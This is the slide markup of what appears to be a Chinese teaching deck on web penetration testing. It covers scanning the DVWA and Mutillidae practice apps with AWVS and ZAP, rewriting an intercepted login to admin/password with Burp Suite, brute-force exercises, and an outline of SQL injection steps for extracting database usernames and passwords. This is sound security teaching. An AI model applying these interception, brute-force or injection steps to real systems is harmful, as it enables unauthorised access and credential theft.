                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>输入信息</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2000">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（3）找到username=test&amp;password=test，将它修改为username=admin&amp;password=password点击Forward，将修改后的数据包发送到服务器端。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="200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endParaRPr lang="zh-CN" sz="2000" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2000">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（4）切换到Firefox浏览器查看结果，显示登录成功。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
              <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="组合 3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1532255" y="2446020"/>
            <a:ext cx="7986395" cy="3447415"/>
            <a:chOff x="564" y="4034"/>
            <a:chExt cx="13190" cy="5694"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5" name="图片 -2147482543"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:srcRect l="588" t="12204" r="47733" b="1022"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="564" y="4034"/>
              <a:ext cx="13191" cy="5695"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="圆角矩形 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="755" y="5419"/>
              <a:ext cx="1994" cy="421"/>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7" name="标题 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="358775"/>
            <a:ext cx="10812780"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任务实施三：</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>使用Burp Suite</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69900" indent="-469900" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>使用AWVS对Mutillidae和DVWA进行漏洞扫描。</a:t>
            </a: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lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>使用ZAP对Mutillidae和DVWA进行漏洞扫描。</a:t>
            </a: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lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>使用ZAP对DVWA的Low级别的暴力破解漏洞进行破解。</a:t>
            </a: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lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>使用Burp Suite对DVWA登录页面的用户名和密码进行拦截与修改。</a:t>
            </a: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latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>任务训练</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>】</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36560"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latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>任务评价</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>】</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19" name="矩形 18"/>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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="23" name="表格 22"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2782570" y="1967230"/>
          <a:ext cx="7922260" cy="4199255"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="1108710"/>
                <a:gridCol w="394589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项目名称：6.1 Web</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="0">
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>渗透测试工具</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152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1、AWVS 使用</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en-US" sz="1600" b="0">
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>2、ZAP 使用</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en-US" sz="1600" b="0">
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>3、Burp Suite 的功能</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en-US" sz="1600" b="0">
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>4、Burp Suite 拦截代理的</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="en-US" sz="16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使用</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="0">
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>。</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en-US" sz="1600" b="0">
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>1、使用 AWVS 扫描漏洞</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en-US" sz="1600" b="0">
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>2、使用 ZAP 扫描漏洞</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="0">
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>；</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="en-US" sz="1600" b="0">
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>3、使用 Burp Suite 的拦截代理</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="0">
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>。</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latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>任务评价</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>】</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19" name="矩形 18"/>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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="22" name="表格 21"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>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项目名称：6.1 Web</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
                        <a:t>渗透测试工具</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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="组合 1"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="533756" y="1853381"/>
            <a:ext cx="4302496" cy="638783"/>
            <a:chOff x="6627851" y="1754191"/>
            <a:chExt cx="4302496" cy="638783"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="矩形: 圆角 26"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId6"/>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7"/>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custDataLst>
                <p:tags r:id="rId8"/>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custDataLst>
                <p:tags r:id="rId9"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6636560"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latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>任务拓展</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101" name="文本框 100"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="835025" y="1952625"/>
            <a:ext cx="10624820" cy="3143885"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>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使用AppScan对Mutillidae和DVWA进行扫描漏洞。</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使用Nikto对Mutillidae和DVWA进行扫描漏洞。</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使用w3af对Mutillidae和DVWA进行扫描漏洞。</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r>
              <a:rPr sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>使用Burp Suite对DVWA的Low级别的暴力破解漏洞进行破解。</a:t>
            </a:r>
            <a:endParaRPr sz="4000">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4000" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>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2" name="矩形 1"/>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02</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altLang="zh-CN" sz="4000" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>6.2 </a:t>
              </a:r>
              <a:r>
                <a:rPr sz="4000" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>SQL注入漏洞</a:t>
              </a:r>
              <a:endParaRPr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34" cy="4347"/>
              <a:chOff x="672" y="3092"/>
              <a:chExt cx="14834"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任务描述</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84" y="6880"/>
                <a:ext cx="1622"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
        <p:nvSpPr>
          <p:cNvPr id="52" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId11"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="252730" y="56515"/>
            <a:ext cx="547560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rPr>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>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vert="horz" anchor="b" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>学习目标</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720090" y="1681480"/>
            <a:ext cx="10800080" cy="1583690"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>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rPr>
              <a:t>1、</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理解SQL注入的基本原理。</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掌握SQL注入漏洞的利用。</a:t>
            </a:r>
            <a:endParaRPr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609600" eaLnBrk="0" fontAlgn="auto" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="12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sz="240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了解SQL注入漏洞的防范措施。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20000" y="1681200"/>
            <a:ext cx="10800000" cy="4011930"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL注入是一种危险系数很高并且很常见的攻击方式。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>注入攻击是针对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>应用程序的后台数据库进行的，会导致数据库内容泄露、数据篡改、数据损毁，甚至可能发生操作系统执行任意命令等安全问题。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
              <a:effectLst/>
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>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lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>本任务介绍</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>注入攻击的基本原理，讲解</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>注入漏洞的利用方法及防范措施。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
              <a:effectLst/>
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>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18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="86423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sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>任务分析</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4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2847340"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marR="0" indent="0" algn="just" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <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一、</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SQL注入攻击的基本原理</a:t>
            </a:r>
            <a:endParaRPr sz="2400" kern="100" dirty="0">
              <a:effectLst/>
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>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SQL注入攻击是针对Web应用程序的后台数据库进行的。SQL注入漏洞发生在构造SQL语句上，如果直接将用户输入的数据拼接到SQL语句中，而没有进行适当的验证或过滤，就可能为攻击者留下可乘之机</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攻击者可以利用这一点，通过输入恶意构造的SQL代码，来改变SQL语句的逻辑，执行未授权的数据库操作</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导致数据库内容泄露、数据篡改、数据库损毁等。</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0" marR="0" indent="457200" algn="just">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" alt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 </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4216400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marR="0" indent="0" algn="just" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <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二、SQL注入攻击的类型</a:t>
            </a:r>
            <a:endPar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1、字符型SQL注入</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2、数字型SQL注入</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0" algn="just" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>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三、</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通过</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SQL注入攻击</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获取网站数据库</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中</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用户名和密码的步骤</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1、猜解SQL查询语句中的字段数</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2、获取当前数据库名</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3、获取当前数据库的表名</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4、获取表中的字段名</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5、获取用户名和密码</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0" marR="0" indent="457200" algn="just">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buNone/>
            </a:pP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90" y="1681480"/>
